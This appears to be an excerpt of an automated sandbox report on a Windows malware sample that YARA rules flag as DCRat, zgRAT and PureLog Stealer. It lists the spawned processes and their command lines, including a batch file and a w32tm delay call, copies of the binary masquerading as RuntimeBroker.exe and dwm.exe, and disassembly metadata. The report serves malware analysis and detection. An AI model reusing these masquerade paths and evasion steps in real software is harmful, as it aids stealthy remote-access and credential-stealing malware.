                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline"
                                                                    Imagebase:0x7ff78ce80000
                                                                    File size:2'759'232 bytes
                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:04:02:49
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:8
                                                                    Start time:04:02:50
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP"
                                                                    Imagebase:0x7ff7db0b0000
                                                                    File size:52'744 bytes
                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:13
                                                                    Start time:04:02:50
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.cmdline"
                                                                    Imagebase:0x7ff78ce80000
                                                                    File size:2'759'232 bytes
                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:14
                                                                    Start time:04:02:50
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:15
                                                                    Start time:04:02:51
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE4ED.tmp" "c:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMP"
                                                                    Imagebase:0x7ff7db0b0000
                                                                    File size:52'744 bytes
                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:16
                                                                    Start time:04:02:52
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat"
                                                                    Imagebase:0x7ff6638f0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:17
                                                                    Start time:04:02:52
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:18
                                                                    Start time:04:02:52
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\System32\chcp.com
                                                                    Wow64 process (32bit):false
                                                                    Commandline:chcp 65001
                                                                    Imagebase:0x7ff782d50000
                                                                    File size:14'848 bytes
                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:19
                                                                    Start time:04:02:52
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\System32\w32tm.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                    Imagebase:0x7ff7efa10000
                                                                    File size:108'032 bytes
                                                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:23
                                                                    Start time:04:02:58
                                                                    Start date:21/08/2024
                                                                    Path:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                                    Imagebase:0x300000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2519392668.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2519392668.0000000002F28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2519392668.00000000028D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:24
                                                                    Start time:04:03:00
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\DiagTrack\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\DiagTrack\RuntimeBroker.exe"
                                                                    Imagebase:0xf0000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 74%, ReversingLabs
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:27
                                                                    Start time:04:03:09
                                                                    Start date:21/08/2024
                                                                    Path:C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                                                                    Imagebase:0x320000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 74%, ReversingLabs
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:30
                                                                    Start time:05:58:02
                                                                    Start date:21/08/2024
                                                                    Path:C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                                                                    Imagebase:0xe10000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 74%, ReversingLabs
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:31
                                                                    Start time:05:58:11
                                                                    Start date:21/08/2024
                                                                    Path:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                                    Imagebase:0xb10000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:32
                                                                    Start time:05:58:19
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\DiagTrack\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\DiagTrack\RuntimeBroker.exe"
                                                                    Imagebase:0xb50000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:33
                                                                    Start time:05:58:27
                                                                    Start date:21/08/2024
                                                                    Path:C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                                                                    Imagebase:0xe60000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:36
                                                                    Start time:05:58:36
                                                                    Start date:21/08/2024
                                                                    Path:C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                                                                    Imagebase:0xbc0000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:37
                                                                    Start time:05:58:44
                                                                    Start date:21/08/2024
                                                                    Path:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                                    Imagebase:0xf50000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:38
                                                                    Start time:05:58:52
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\DiagTrack\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\DiagTrack\RuntimeBroker.exe"
                                                                    Imagebase:0xa00000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:39
                                                                    Start time:05:59:00
                                                                    Start date:21/08/2024
                                                                    Path:C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                                                                    Imagebase:0x320000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:40
                                                                    Start time:05:59:08
                                                                    Start date:21/08/2024
                                                                    Path:C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                                                                    Imagebase:0x450000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:41
                                                                    Start time:05:59:16
                                                                    Start date:21/08/2024
                                                                    Path:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                                    Imagebase:0xb80000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:9.6%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:3
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 8441 7ffaad0dde01 8443 7ffaad0dde1f QueryFullProcessImageNameA 8441->8443 8444 7ffaad0ddfc4 8443->8444

                                                                      Executed Functions

                                                                      Function 00007FFAACCE0D4C Relevance: 6.5, Strings: 5, Instructions: 257COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "9$5X_H$b4$r6$r6
                                                                      • API String ID: 0-3501087565
                                                                      • Opcode ID: 5cf72a81b3814e74755476172e8df64c9b1d57c9ba90fd7bac87a141e5f80cee
                                                                      • Instruction ID: 3af66b9a1849358e5d310813852738c903bc19dfdd2d081a43e49fbff938dabd
                                                                      • Opcode Fuzzy Hash: 5cf72a81b3814e74755476172e8df64c9b1d57c9ba90fd7bac87a141e5f80cee
                                                                      • Instruction Fuzzy Hash: 0591E2B1918A898FF789DB68C86A7A9BFE1FF56310F4101BAC04DD73D2CB7858158781
                                                                      Function 00007FFAACCE0E43 Relevance: 3.9, Strings: 3, Instructions: 171COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 164 7ffaacce0e43-7ffaacce0e8c 169 7ffaacce0e92-7ffaacce0eb9 164->169 171 7ffaacce0ebb-7ffaacce0f05 169->171 175 7ffaacce0f07-7ffaacce0f1d 171->175 176 7ffaacce0f1e 171->176 175->176 177 7ffaacce0f1f-7ffaacce0f4c 175->177 176->177 181 7ffaacce0f4e-7ffaacce0f67 177->181 182 7ffaacce0f6f-7ffaacce0ff1 181->182 184 7ffaacce0ff3-7ffaacce104f 182->184 185 7ffaacce1050 182->185 184->185
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: b4$r6$r6
                                                                      • API String ID: 0-3183416175
                                                                      • Opcode ID: ae78423efa29a6e557dc877cbf0431bc49d17985597cc483fd40b6b68a165a14
                                                                      • Instruction ID: 1638bc3dee9db1b123ea27cf8324b73a0845f50149995705cb929a04b8a49332
                                                                      • Opcode Fuzzy Hash: ae78423efa29a6e557dc877cbf0431bc49d17985597cc483fd40b6b68a165a14
                                                                      • Instruction Fuzzy Hash: 7851B4B2A18A499EF388CF58C85A7A9BFE1EF9A314F4005BEC00DD37D1CB7958158781
                                                                      Function 00007FFAAD0DCDDD Relevance: 1.8, Strings: 1, Instructions: 535COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 443 7ffaad0dcddd-7ffaad0dce41 447 7ffaad0dce43-7ffaad0dce5d 443->447 448 7ffaad0dce5f 443->448 449 7ffaad0dce64-7ffaad0dce66 447->449 448->449 451 7ffaad0dce68-7ffaad0dce6c 449->451 452 7ffaad0dce71-7ffaad0dce74 449->452 453 7ffaad0dd3c1-7ffaad0dd3cf 451->453 454 7ffaad0dd183-7ffaad0dd186 452->454 455 7ffaad0dce7a-7ffaad0dce83 452->455 456 7ffaad0dd2a0-7ffaad0dd2a3 454->456 457 7ffaad0dd18c-7ffaad0dd1e7 call 7ffaad0dc478 call 7ffaad0dc428 454->457 458 7ffaad0dce89-7ffaad0dcea2 call 7ffaad0dbc80 455->458 459 7ffaad0dd3bd-7ffaad0dd3be 455->459 456->459 461 7ffaad0dd2a9-7ffaad0dd30c call 7ffaad0dc400 call 7ffaad0db430 call 7ffaad0dc428 456->461 502 7ffaad0dd1e9-7ffaad0dd20e call 7ffaad0dc450 457->502 503 7ffaad0dd20f-7ffaad0dd28c 457->503 465 7ffaad0dcea8-7ffaad0dceab 458->465 466 7ffaad0dd070-7ffaad0dd0dd call 7ffaad0dc478 458->466 459->453 510 7ffaad0dd334-7ffaad0dd3b1 461->510 511 7ffaad0dd30e-7ffaad0dd333 call 7ffaad0dc450 461->511 465->466 468 7ffaad0dceb1-7ffaad0dcecb 465->468 531 7ffaad0dd0e0-7ffaad0dd15f 466->531 478 7ffaad0dcef3-7ffaad0dcf0f 468->478 479 7ffaad0dcecd 468->479 482 7ffaad0dced2-7ffaad0dced4 478->482 479->482 486 7ffaad0dced6-7ffaad0dcee8 call 7ffaad0dc538 482->486 487 7ffaad0dcf1a-7ffaad0dcf84 call 7ffaad0db430 call 7ffaad0dc478 call 7ffaad0dc4a0 482->487 504 7ffaad0dceed-7ffaad0dcf16 486->504 540 7ffaad0dd065-7ffaad0dd069 487->540 541 7ffaad0dcf8a-7ffaad0dcfce call 7ffaad0dca80 487->541 502->503 503->459 547 7ffaad0dd292-7ffaad0dd29b 503->547 504->479 515 7ffaad0dcf18 504->515 510->459 550 7ffaad0dd3b3-7ffaad0dd3bc 510->550 511->510 515->478 560 7ffaad0dd172-7ffaad0dd178 531->560 561 7ffaad0dd161-7ffaad0dd16f 531->561 540->531 558 7ffaad0dcfd4-7ffaad0dd03f call 7ffaad0dc400 call 7ffaad0db580 call 7ffaad0dc428 541->558 559 7ffaad0dd06b 541->559 547->459 550->459 558->540 574 7ffaad0dd041-7ffaad0dd060 call 7ffaad0dc450 558->574 559->466 560->458 563 7ffaad0dd17e 560->563 561->560 563->459 574->540
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302862281.00007FFAAD0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAD0D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaad0d0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X
                                                                      • API String ID: 0-3240521626
                                                                      • Opcode ID: 04af20d6f483a1cd1485e0d9e4ee00968376525463335f7e11a533394acb79f7
                                                                      • Instruction ID: b06466b6fe1b842bb52e6153d23c9782207a53b20894d3fc91b9acd9b8519348
                                                                      • Opcode Fuzzy Hash: 04af20d6f483a1cd1485e0d9e4ee00968376525463335f7e11a533394acb79f7
                                                                      • Instruction Fuzzy Hash: 1B02C470A19A498FE788EB68C4566B877D2FF9A304F15417BD09FC3282DD28AC4987C1
                                                                      Function 00007FFAAD0DDE01 Relevance: 1.8, APIs: 1, Instructions: 296COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302862281.00007FFAAD0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAD0D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaad0d0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID: FullImageNameProcessQuery
                                                                      • String ID:
                                                                      • API String ID: 3578328331-0
                                                                      • Opcode ID: 5fddd3926eb0dbea21766c77b74c72d554075d06ffc57ad2c2af02df7c2fae3a
                                                                      • Instruction ID: a8471759adc044d0f3f5478ddecbd3964ca3db290c077ffcd6ba42d288f0d186
                                                                      • Opcode Fuzzy Hash: 5fddd3926eb0dbea21766c77b74c72d554075d06ffc57ad2c2af02df7c2fae3a
                                                                      • Instruction Fuzzy Hash: 1891A270509A8C8FDB68DF18D84A7F937D1FB59315F00812FE88EC7292DA75A8558B81
                                                                      Function 00007FFAACCE1280 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      • Opcode ID: 1c5fb20756c2f7abf1a7cdaaa328ef1d6690f204abb28e11399e716fb63ef010
                                                                      • Instruction ID: a3c5471cab02e437a9cc5146cede71ea8e1c7518005d6da48876308e230774f9
                                                                      • Opcode Fuzzy Hash: 1c5fb20756c2f7abf1a7cdaaa328ef1d6690f204abb28e11399e716fb63ef010
                                                                      • Instruction Fuzzy Hash: 01110AA2A1958E8EFB98AA3888597FA7AC1DF5A240F4105BDE41FD21C7DD1D9C0843D1
                                                                      Function 00007FFAACCE08D0 Relevance: .2, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7afca9b20cc26904101bd20c8038c736a43faecde94c9f8aaf71848f0e5b0fb7
                                                                      • Instruction ID: 0d8bf596ae2a6d0e1242a78b8f723402889f6dd49709b39808aa0b16f1c9ffb9
                                                                      • Opcode Fuzzy Hash: 7afca9b20cc26904101bd20c8038c736a43faecde94c9f8aaf71848f0e5b0fb7
                                                                      • Instruction Fuzzy Hash: F1411D7260C9558FE715EBBCE4899F97BD0EF4632070445BBD08ECB167EB14A88287C5
                                                                      Function 00007FFAACCE090D Relevance: .1, Instructions: 146COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 03592aed68e86ed8fd9ad0774ebca2118fa98385e825a4f4457e6a52ca8c4f72
                                                                      • Instruction ID: a4bda8b7c903ddec4c260dc73d811add52927fd0c483d7220a9b12b45cc5b1c6
                                                                      • Opcode Fuzzy Hash: 03592aed68e86ed8fd9ad0774ebca2118fa98385e825a4f4457e6a52ca8c4f72
                                                                      • Instruction Fuzzy Hash: E04128A2A0D6961EF315B77CA05A5F87FD0DF46320B1444FBD04EC71A3CF18A88682C5
                                                                      Function 00007FFAACCE0908 Relevance: .1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction ID: 3fd304e556704ccaa365657339223021dc3883d9598187d508e8f59df50c5179
                                                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction Fuzzy Hash: 3221E63130D8184FE768EF0CE889DB973D1EB5A32130101BEE58EC7226E911EC8287C1
                                                                      Function 00007FFAACCE0960 Relevance: .1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: effcd746bda137c281e6f204c6ca3806fac44aeecf190bfc3cc1eae8c77cc207
                                                                      • Instruction ID: 955c36bf126502690ea1ccf567debfdd154e5678abc2f3c9ff3b38d318c29653
                                                                      • Opcode Fuzzy Hash: effcd746bda137c281e6f204c6ca3806fac44aeecf190bfc3cc1eae8c77cc207
                                                                      • Instruction Fuzzy Hash: 5B3132A2A0EA565FF354B77CA44AAF97BC1DF46321B1444FED40EC31E3CE18A84642C9
                                                                      Function 00007FFAACCE0998 Relevance: .1, Instructions: 110COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
